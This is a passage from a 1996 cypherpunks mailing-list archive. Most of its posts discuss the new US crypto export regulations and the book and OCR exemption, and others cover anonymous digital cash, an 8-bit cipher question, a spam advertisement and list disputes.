>built to work on any known, monospaced font, as is typically used for
>source code.

It seems to me that the authors of the regulations have come to the same
conclusion. Which is why the ban on scannable text is not in the current
version of the regs. But the regulators want to see scannable source banned
that much is clear. At the same time, they do not want to run up against
the wide ranging protections printed speech enjoys.

I expect the solution ultimately employed to use a method similar to what
is currently used in color copiers and digital audio mastering equipment.
Normal color copiers will copy just about all colors except the particular
shade of green used in US currency. Consumer digital audio recording
equipment makes use of copy protection features. Only hideously expensive
"professional" equipment has the copy protection turned off.

We might see something similar for printed source and OCR programs. Printed
source will have to be printed in a specific font. A font that OCR programs
are required to not recognize. OCR programs that do recognize this specific
font will of course be export controlled.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 12:14:13 -0800 (PST)
To: AwakenToMe@aol.com
Subject: Re: With my deepest regards....
In-Reply-To: <961230130027_1156000499@emout15.mail.aol.com>
Message-ID: <32C82238.1E6D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


AwakenToMe@aol.com wrote:
>  Adam Breaux wrote:
>  > I am withdrawing from this list. Not because of the volume of
>  > email...that I can deal with...but what I cannot deal with is the
>  > volume of garbage and egotistical ranting[snippo]
>  Note to cypherpunks:  This guy complains about the problem, but he *is*
>  the problem.  *He* wants to tell us *he's* leaving.  Talk about ego-
>  tistical ranting!  What a hypocrite.

> Since I never said I dont contribute to the problem.. I think Ill point
> out... that in a reverse notion...He isn't the problem.  What you replied
> back is the problem.

Argumentum ad nauseam.  The point is, Adam (I think) wanted to tell us
he's leaving.  Well, who gives a shit, anyway?  Instead of ranting
against me, tell the cypherpunks why they should care that this
particular individual is "leaving the list".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <banisar@epic.org>
Date: Mon, 30 Dec 1996 09:27:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: New crypto regs online
Message-ID: <v03007804aeedaaa5a971@[204.91.138.227]>
MIME-Version: 1.0
Content-Type: text/plain


Hola, The new regs for crypto exports are available at:

http://www.epic.org/crypto/export_controls/interim_regs_12_96.html

Dave


=========================================================================
David Banisar (Banisar@epic.org)                *    202-544-9240 (tel)
Electronic Privacy Information Center           *    202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301             *    HTTP://www.epic.org
Washington, DC 20003
PGP Key: http://www.epic.org/staff/banisar/key.html
=========================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 12:40:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <v02140b04aeec957d92db@[10.0.2.15]>
Message-ID: <v03007801aeedd9802bfc@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 PM -0600 12/30/96, Omegaman wrote:
>On Sun, 29 Dec 1996, Steve Schear wrote:
>
>> I doubt the Executive order can be interpreted to mean U.S. citizens cannot
>> purchase stocks of foreign companies engaged in crypto.  There are many
>> companies (e.g., NEC, Siemans, Philips, ect.) which engage in development
>> of crypto equipment which would not be exportable if they were produced in
>> the U.S.  Can the gov't deny us the right to invest in these and other
>> offshore companies?
>
>You doubt but are you sure?  Potential investors are unsure as well.  The
>executive order has a "chilling effect" on such investments, and could
>affect their actual stock value.

And I think that a prosecutor who _wished_ to make an example of someone
could use the new regs to indeed go after someone who made an "investment"
in the stock of a foreign company! An investment is clearly exactly what
the regs mention.

Now, obviously, all prosecutions have _costs_, and prosecution of someone
for buying $10,000 worth of stock in a large European or Japanese company
doing frowned-upon crypto work would be unlikely...unless that person was
Phil Zimmermann or someone else the feds want zapped. But many investments
are for much larger amounts...if someone invests $200K in the stock of a
company doing frowned upon work, the government might well decide to
prosecute.

That the regs clearly give them the authority to prosecute is the key.

The essence of a terror state is that one never knows when the hammer will
fall. This "FUD" (aka "random reinforcement") keeps the sheeple in line.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 30 Dec 1996 09:55:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ssn hack
Message-ID: <961230125459_271074053@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-29 08:35:47 EST, jazzmin@ou.edu (Jazzmin Belle
Sommers) writes:

<< She bought it!  I got asked where I belonged to, so I said Germany (not
 actually a lie, it's my heritage).  Next time I think I'll say Belgium.
 What's that itty bitty country between France and Spain?  Angorra?  Yeah.
 That's it.>>

That sure isn't a hack.... maybe Im not seeing the advantages of it.. as
compared to 
 just saying 'I dont give it out..etc..'

<< What, you really think someone's actual name is Jazzmin Belle Sommers?
 Get
 outta town!
  >>

Nahhhhh ya spelled it WAY differently and Angora is wrong.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 30 Dec 1996 10:01:17 -0800 (PST)
To: admin@veracruz.net
Subject: Re: With my deepest regards....
Message-ID: <961230130027_1156000499@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-29 16:00:50 EST, dthorn@gte.net (Dale Thorn) writes:

<< 
 Adam Breaux wrote:
 > I am withdrawing from this list. Not because of the volume of
 > email...that I can deal with...but what I cannot deal with is the
 > volume of garbage and egotistical ranting that seems so prevalent in
 > what should for all sakes and purposes be a discussion of cyphering
 > and security. Apparently the name of this list is designed to
 > mislead...because of all the posts, a grand total of 5% proved worth
 > reading at all.
 
 Note to cypherpunks:  This guy complains about the problem, but he *is*
 the problem.  *He* wants to tell us *he's* leaving.  Talk about ego-
 tistical ranting!  What a hypocrite.
 
 BTW, 5% is a pretty good percentage in my book.
 
  >>
Since I never said I dont contribute to the problem.. I think Ill point
out... that in a reverse notion...He isn't the problem.  What you replied
back is the problem. I DONT see this list (the other 95%) filled with people
saying that they dont like the list. So..since he isnt the other 95% (maybe
>0.5% complain) and you with a useless post... are (is) the porblem. I know
this post back doesn''t 'help' but I think it brings to light problems with a
list that exists for a purpose. Think of it as a democracy on a list. It
exists for a reason.. and the people support THAT existence.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Mon, 30 Dec 1996 04:01:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: IDEA ecryption algorithm in 8 bits ?
Message-ID: <199612301202.NAA00276@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I hope that this mail will find his way to the mailling list.

I have one question. For one small embedded application, I need some encryption
algorithm which can be easily implemented in 8 bit microcontroller with 38 bytes
of RAM and 1KB of ROM. 

I tried to modify the IDEA algorithm to 8 bit operations - all multiplications
modulo 257, subkey length 52 bytes, block size 4 bytes. Simply, all operations
are converted from 16/32 bits to 8/16 bits.
Because I am no professional cryptographer, I would like to ask you, if there is
some major problem with this modified algorithm. Something what makes the 8 bit
variant completely useless ?

Is it possible to use this encryption algorithm ? I know that this variant will
be far less secure than IDEA itself, but I don't need so strong encryption. The
amount of data for encryption will be small, approx. 16 - 32 bytes.

Thank you for every information.


Best regards and PF 1997


Pavel Korensky

 


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Mon, 30 Dec 1996 14:13:50 -0800 (PST)
To: bdolan@USIT.NET
Subject: Re: ~digicash at Shell
In-Reply-To: <Pine.GSO.3.95.961223103208.9873C-100000@use.usit.net>
Message-ID: <199612302148.NAA23846@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Shell is now marketing a stored-value card in $25, $50, and $100 face
> denominations.  The $100 card retails for $94 right now.  I'm not sure if
> that discount will be a long-term thing or if it's just to get people
> hooked.  Anyway, the card can be purchased anonymously for cash and can be
> used to buy anything at Shell.  I like to use the automated
> pay-at-the-pump gizmos to save time but I don't like to leave a digital
> footprint behind on my credit card statement for Louis' Legions to peruse,
> so I think the stored-value card is a step forward for privacy.

Is this a "stored value smart card", or something like most US phone
cards, where the "account number" is used to debit a centrally
maintained account?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 13:51:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regulations
In-Reply-To: <3.0.32.19961230120642.006ac9ec@netcom13.netcom.com>
Message-ID: <v03007800aeede9f25d5c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM -0800 12/30/96, Lucky Green wrote:

>I expect the solution ultimately employed to use a method similar to what
>is currently used in color copiers and digital audio mastering equipment.
>Normal color copiers will copy just about all colors except the particular
>shade of green used in US currency. Consumer digital audio recording
>equipment makes use of copy protection features. Only hideously expensive
>"professional" equipment has the copy protection turned off.
>
>We might see something similar for printed source and OCR programs. Printed
>source will have to be printed in a specific font. A font that OCR programs
>are required to not recognize. OCR programs that do recognize this specific
>font will of course be export controlled.

I doubt this. This would be too absurd even for the feds...a special font
to be used in books?

As I said, hand-entry of text and code is already very cheap....and any
code fragments desired to be exported can be trivially taken out in any of
the zillions of floppies and disks crossing the borders each day, or the
Net of course (stego, hidden, remailed, whatever).

The whole book thing is an oddity...no meaningful crypto is going to be
helped or hindered by the book exception.

What _could_ conceivably happen is that export of some code fragment could
be given plausible deniability that an export violation occurred by having
a paper version distributed widely. "Honest...we didn't send PGP 3.0 to
Europe! Someone must've OCRed or manually typed in the code we published in
"PGP 3--The Text.""

This strategem would work even if the feds mandated some special
non-OCRable font (which I doubt could exist...if humans can read the font,
so can trainable OCR programs, which of course don't rely on having
libraries of particular fonts).

--Tim May


--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: swedoc@swedoc.se
Date: Mon, 30 Dec 1996 05:09:12 -0800 (PST)
To: swedoc@swedoc.se
Subject: JOIN NOW!
Message-ID: <199612301300.OAA18385@tomei.algonet.se>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
If you wish to be removed from our future mailings, please reply with the subject 
"Remove" and this software will automatically block you from future mailings.
//////////////////////////////////////////////////////////////////////////////

DEAR SIRS,

NEW WEBSITE TO BE LAUNCHED - THE SWEDOC GROUP - 
GLOBAL MARKET-PLACE (24 HOURS A DAY 7 DAYS A WEEK!)

* PROPERTIES                     * PROJECTS 

* INVESTMENT OPPORTUNITIES       * FINANCIAL CONSULTANCY SERVICES

WE ARE LOOKING FOR AFFILIATED INTERNATIONAL CONSULTANTS!!! 

EXCELLENT OPPORTUNITY!!! 50% COMMISSION!!!

TOGETHER WE WILL BECOME THE PREMIER NETWORK!!!
________________________________________________________________________

EMAIL US FOR "AFFILIATED INTERNATIONAL CONSULTANTS" APPLICATION FORM:

                        swedoc@swedoc.se
________________________________________________________________________

LENDING AND FUNDING FACILITY AVAILABLE. EMAIL US FOR FURTHER INFO.:

                        swedoc@swedoc.se
________________________________________________________________________

COME VISIT US NOW!!!    http://www.swedoc.se
________________________________________________________________________

THANK YOU FOR YOUR ATTENTION.
-- 
_________________________

The SWEDOC Group

Engelbrektsgatan 28 
S-411 37 Gothenburg 
Sweden

Email: swedoc@swedoc.se

http://www.swedoc.se
_________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Mon, 30 Dec 1996 14:20:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: So secure no technology avail in the world capable of breaking it
Message-ID: <3.0.32.19691231160000.0069b4a4@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


>From Risks 18.70...

Date: 20 Dec 96 15:13:17 EST
From: Andrew Weir <100637.616@CompuServe.COM>
Subject: ATM gangsters

Much British media panic has been devoted to the recent conviction of an
"ATM gang" of high ambition. A collection of high-grade villains with
impeccable pedigrees in robbery, gangsterism and drugs dealing over 30 years
compelled a software expert who was in prison for attacking his wife and
child to help them in their enterprise. The man revealed his role to a
prison chaplain and subsequently acted as an undercover informer on his
release.

[...]

Code-breaking gangsters?

But could they have got that far? Newspaper reports failed to emphasise the
all-important question as to whether the encrypted information could be
decoded.  Defence counsel were scathing about the possibilities and called
experts to testify that it was effectively impossible. One of the defence
barristers said: "The basic method was fatally flawed ... because the
encryption system used by the banks is so secure that no current technology
available in the world, not even the combined expertise of the world's
leading scientists, is capable of breaking it."

The judge appeared to accept this, with a proviso. Addressing the
defendants, he said in sentencing them: "It was not possible for you, with
the equipment and expertise then at your disposal, to carry out this fraud
to a successful conclusion. There is, in particular, no evidence that the
cards recovered by the police would then work or that the codes had then
been broken. However, beyond that I'm not prepared to go. I do not believe
it is necessary to go further but for the avoidance of doubt I make it clear
that it would, in my judgment, be irresponsible and wrong on the basis of
the information before me to accept any additional assurances along the
lines that this is a fraud that no one could ever commit."

Lawyers being what they are, the judge could not exclude the possibility
that the decryption was possible, even though the remoteness of that
possibility does not seem to have struck home, particularly when it is
considered that the gang's only computer expert was working against
them. The gang's expert claimed no expertise in cryptography and yet said in
evidence that there had been a successful decryption dry run. This was not
corroborated elsewhere, and the judge did not accept it.

[...]


 http://catless.ncl.ac.uk/Risks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Mon, 30 Dec 1996 11:18:44 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <v02140b04aeec957d92db@[10.0.2.15]>
Message-ID: <Pine.LNX.3.95.961230112949.594C-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Dec 1996, Steve Schear wrote:
 
> I doubt the Executive order can be interpreted to mean U.S. citizens cannot
> purchase stocks of foreign companies engaged in crypto.  There are many
> companies (e.g., NEC, Siemans, Philips, ect.) which engage in development
> of crypto equipment which would not be exportable if they were produced in
> the U.S.  Can the gov't deny us the right to invest in these and other
> offshore companies?

You doubt but are you sure?  Potential investors are unsure as well.  The
executive order has a "chilling effect" on such investments, and could
affect their actual stock value.

The idea strikes me as an attempt to slow strong crypto development so
U.S.-sponsored escrow alternatives can be put into wide deployment.

It may also be a "trial-balloon" to see if the USG can get away with deny
individuals and corporations the right to invest in "non-approved"
technologies.  The current administration is hell-bent on imposing any
limitations it can.

All this makes me wonder why there is any doubt that this country has
devolved into a near police-state.  Compromise away your rights and you get
what you deserve.

_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 14:31:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <Pine.LNX.3.95.961230105436.594A-100000@jolietjake.com>
Message-ID: <v03007801aeedf3cfaecb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:59 PM -0500 12/30/96, Mark M. wrote:

>On Mon, 30 Dec 1996, Omegaman wrote:

>> One rogue bank, therefore, can be frozen out if others are not using
>> Chaumian cash.
>
>I don't see how one bank offering fully anonymous digital cash could be
>"frozen out."  Partially untracable cash systems may be much more popular, but
>as long as the fully anonymous system receives enough money to stay in
>business, there would be little risk of fading away.  A bank offering fully
>anonymous digital cash could be used for tax evasion, extortion, and money
>laundering.  These crimes usually involve large sums of money, so this would
>keep the bank in business.

Precisely my sentiment. And as I said in my main response to Omegaman's
points, all Ed the Extortionist has to do is cash in his digibux at the
bank; at worst this involves a trip to the physical site of the bank.

(Yes, he may be photographed by the bank, etc., but the payments are
untraceable, meaning, unlinkable. All the bank knows is that Ed is
redeeming $100,000 worth of digibux, and taking his payment in dollars, or
gold, or whatever. I grant you that having only fully untraceable digital
cash issuer is far from ideal, for various reasons. But I was addressing
the point Omegaman made that having only one such bank would mean it would
or could be driven out of business by other banks...I disagree.)

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Mon, 30 Dec 1996 11:59:32 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <32C7F074.3FA3@gte.net>
Message-ID: <199612301959.OAA04800@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn sez:
> 
> In the late 1970's (I think), Victor Marchetti (formerly of CIA) wrote
> The CIA and the Cult of Intelligence (title approx.), and the CIA was
> allowed by the courts to censor portions of the book.
> 
> As I remember, those portions were released later in a new edition,
> primarily because the blacked-out parts were not in fact big-time
> secrets, but simply embarrassments for the agency.
> 
> Is this a representative case?

I doubt it. When first granted access to classified, you must sign a
civil contract not to publish anything without clearing same. That
restricts your actions. 

But if you are writing a book, and the New York Times learns details
by other than you telling them [To use a favorite of this group; one
I scoff at as it's made to "look easy" -- let's say the NYT used
Tempest techniques..], then can the USG go after the NYT and engage
prior restraint? No, in my understanding.

I hedge cuz this came about as a result of Phillip Agee [sp] but I
do not recall exactly when.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 30 Dec 1996 15:14:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto reg clarification from Commerce Department
Message-ID: <3.0.32.19961230151451.006aafd0@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just got of the phone with Bruce Kutz, Export Policy Analyst, Office of
Strategic Trade and Foreign Policy Controls. (202) 482-0092. He seems to be
the contact person for the new regs.

I pointed Mr. Kutz to the section that alarmed me:

Sec. 736.2  General prohibitions and determination of applicability.
      
     * * * * *
      
         (7) General Prohibition Seven--Support of Certain Activities by
     U.S. persons--(i) Support of Proliferation Activities (U.S. Person
     Proliferation Activity). If you are a U.S. Person as that term is
     defined in Sec. 744.6(c) of the EAR, you may not engage in any
     activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
     prohibits the performance, without a license from BXA, of certain
     financing, contracting, service, support, transportation, freight
     forwarding, or employment that you know will assist in certain
     proliferation activities described further in part 744 of the EAR.
     There are no License Exceptions to this General Prohibition Seven in
     part 740 of the EAR unless specifically authorized in that part.

Mr. Kutz seemed surprised. Apparently he had not been aware that this
section was included in the new crypto regs. He then assured me that

1. Proliferation in the context of this paragraph applies only to
proliferation of
a) nuclear (bomb) technology
b) missile technology

He read to me EAR Sec. 744.6 (a) or (b), which are referred to in the
paragraph in question. Sec. 744.6 (a) or (b) seems to support this view.
However, he did not explain to me why the paragraph was included in the
crypto export regulations when it only applies to nukes and missiles.

2. The Department of Commerce has no intention of banning the financing and
contracting of non-US crypto development.

3. Technical assistance to non-US parties requires a license.

Mr. Kutz encouraged me to make use of the public comment period and ask
Commerce to clarify the section. Public comments will be accepted until
February 13, 1997. [Public comment is requested only after the new regs
took effect...]

I received the impression that Mr. Kutz genuinely believes that the section
in question does not apply to crypto. If I was concerned about potentially
violating the regulations, I would try to get a written statement from
Commerce that Mr. Kutz's view is indeed correct. As always, IANAL.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Mon, 30 Dec 1996 12:30:42 -0800 (PST)
To: hal@rain.org (Hal Finney)
Subject: Re: New crypto regulations
In-Reply-To: <199612301757.JAA00424@crypt.hfinney.com>
Message-ID: <199612302030.PAA05013@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney sez:
> 
> In this light, the explicit exemption for printed materials is really
> quite welcome.  It has never been 100% clear that a book of source code
> is exportable.  Yes, we've had some favorable court cases recently but
> none of these have been fully resolved.  Rumors were posted here that
> the NSA came very close to trying to stop the export of the original PGP
> source code book from MIT Press (and supposedly arranged for MIT to be
> punished later for its audacity).

My uncharitable side says that is because they wanted to stay as far
away from cries of "book-banning" as they could. If nothing else, IN
THAT NARROW CASE, reason prevailed over fervor.

And I caution against thinking in terms of "NSA did" in favor of
"Under FBI pressure, NSA did" just to remind ourselves where the
real battle lies..... 

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Johnson <mark@hercules.reno.nv.us>
Date: Mon, 30 Dec 1996 15:50:45 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: New crypto regulations
In-Reply-To: <199612301757.JAA00424@crypt.hfinney.com>
Message-ID: <32C85647.389F@hercules.reno.nv.us>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:
> 
> From: Mike McNally <m5@tivoli.com>
> > solman@MIT.EDU wrote:
> > > The government's claim is that in the interests of national security,
> > > export of cryptography must be prevented. By limiting the policy's
> > > applicability to media which are in, or can easily be converted to,
> > > electronic form ...
> >
> > Does anybody seriously believe that nbody writing these policies has
> > an understanding of OCR software?  An on-line form of code printed
> > in a book is just a quick trip to a scanner away.  They know that.
> 
> The regs, as Lucky pointed out, do hint at restrictions on OCR fonts in
> the future.  However this is obviously doomed since as OCR technology
> advances the distinction between OCR and non-OCR fonts will vanish.
> I imagine that a special purpose character recognition engine could be
> built to work on any known, monospaced font, as is typically used for
> source code.
> 
> In this light, the explicit exemption for printed materials is really
> quite welcome.  It has never been 100% clear that a book of source code
> is exportable.  Yes, we've had some favorable court cases recently but
> none of these have been fully resolved.  Rumors were posted here that
> the NSA came very close to trying to stop the export of the original PGP
> source code book from MIT Press (and supposedly arranged for MIT to be
> punished later for its audacity).
> 
> Having all sides agree that crypto source code can be exported in printed
> form is an important step in the right direction.  We can still contest
> the issue of restrictions on machine readable exports.  In an era where
> electronic publishing is becoming as important as paper publishing for
> expressing ideas, we can continue to push to extend the exemption to
> machine-readable images of the pages of the book, and later to actual
> source files.
> 
> Hal

To hell with it, lets just send it over a modem and claim its Analog not
electronic transfer.  If MA-Bell (or sibling) wants to change it from
Analog to Digital for overseas transfer then THEY can go after MA-Bell. 
Then if we can't do that then we would not even be allowed to discuss
cryptography (code) verbally as it all gets transformed to electrons now
anyway.  

Can we discuss cryptography code verbally(using sound waves)?

What is the difference between me reading(using sound waves) code line
by line to John Doe versus having my computer(using sound waves)
communicating to John Does's computer,Tape Recorder(high quality), or
his well atuned ear which understands MODEMese (or was that MODEMonics)?

Oh well, it was a good 20 second(or was that 2 second) thought, but I
don't think it'll hold up in court :)

Is anyone geting tired of Uncle Sam (or is that Uncle BAN)taking away
the freedoms that we have fought so hard for, and are trying to give to
all these third world countries such as Bosnia(Oh hell did I mention
something about politcs, Oops)?


-- 
Mark Johnson
Network Project Manager
St. Mary's Regional Med Ctr
mark@hercules.reno.nv.us




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Johnson <mark@hercules.reno.nv.us>
Date: Mon, 30 Dec 1996 15:51:59 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Export proposal
In-Reply-To: <3.0.32.19961230105806.006ac5c4@netcom13.netcom.com>
Message-ID: <32C8572E.6404@hercules.reno.nv.us>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 08:56 AM 12/30/96 -0800, Dale Thorn wrote:
> >What about a fax?  That has to make things more complicated, yes?
> 
> A fax is transmission in electronic form. Clearly banned under the
> regulations.
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>    Make your mark in the history of mathematics. Use the spare cycles of
>    your PC/PPC/UNIX box to help find a new prime.
>    http://www.mersenne.org/prime.htm
Is it, or is it ANALOG?
-- 
Mark Johnson
Network Project Manager
St. Mary's Regional Med Ctr
mark@hercules.reno.nv.us




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 30 Dec 1996 12:55:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <Pine.LNX.3.95.961230105436.594A-100000@jolietjake.com>
Message-ID: <Pine.LNX.3.95.961230155156.983B-100000@eclipse.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 30 Dec 1996, Omegaman wrote:

> Yes.  But we were talking about one only "doubly untraceable" Chaumian
> digicash system.  I feel that if such systems don't see wide and common
> usage, they will fade away in favor off "singly untraceable" and like
> systems. (or be pushed out, such as in the example we played with above).
> 
> One rogue bank, therefore, can be frozen out if others are not using
> Chaumian cash.

I don't see how one bank offering fully anonymous digital cash could be
"frozen out."  Partially untracable cash systems may be much more popular, but
as long as the fully anonymous system receives enough money to stay in
business, there would be little risk of fading away.  A bank offering fully
anonymous digital cash could be used for tax evasion, extortion, and money
laundering.  These crimes usually involve large sums of money, so this would
keep the bank in business.


Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsgtDyzIPc7jvyFpAQGZKAf8DvR1uWWCV5iTcj23YdxNC/Bg5e6+AFYw
buzMoNsHNdpu/LKBMIdr03vLbuOGIDDo+FobHtzVoqss2CExm2mHqlWJWChNO19M
8/M+JGj3RlXVbzKLaXyeTNQtVf9MqUdrxGaT00caggKglzO8w0ghoazbuGZ6nHhy
k2sKB1ghKF+9kJc7yCVMRtimZeCOl+veZjwK/SO3FgrhZD/hnJ0ArLBBF5gfPvOH
451mqcP+1Uy790+Y/+JzHPPAMhX7G7E8QotlHQm21b1nlSRN/eBnbtZwWXdCwf/C
MVYcs1q3nYoQF844RPo0L61hlsxhveYUTSyDtyF2I/KErobyunsz+g==
=2Ueo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Dec 1996 16:25:43 -0800 (PST)
To: Mark Johnson <mark@hercules.reno.nv.us>
Subject: Re: Export proposal
In-Reply-To: <3.0.32.19961230105806.006ac5c4@netcom13.netcom.com>
Message-ID: <32C85D32.3B07@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Johnson wrote:
> Lucky Green wrote:
> > At 08:56 AM 12/30/96 -0800, Dale Thorn wrote:
> > >What about a fax?  That has to make things more complicated, yes?

> > A fax is transmission in electronic form. Clearly banned under the
> > regulations.

> Is it, or is it ANALOG?

Part of the reason for the question is because faxes can be sent and
received with no commitment to paper.  I sort-of understand the focus
on "books" and other hard copy re: freedom of speech, but it seemed to
me the fax issue could be one point in a congressperson's mind in favor
of the notion that the line between paper and electronic/media has been
forever blurred (or erased).  Just a thought.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 16:25:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310025.QAA11547@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the message I got in response to my post regarding Mr. May's
offensive, racist, and bigoted post about ebonics.  I have made
overtures towards peace and tried to explain that I thought that the
Doctor's verbal slapping was not as bad as it seemed, maybe even he
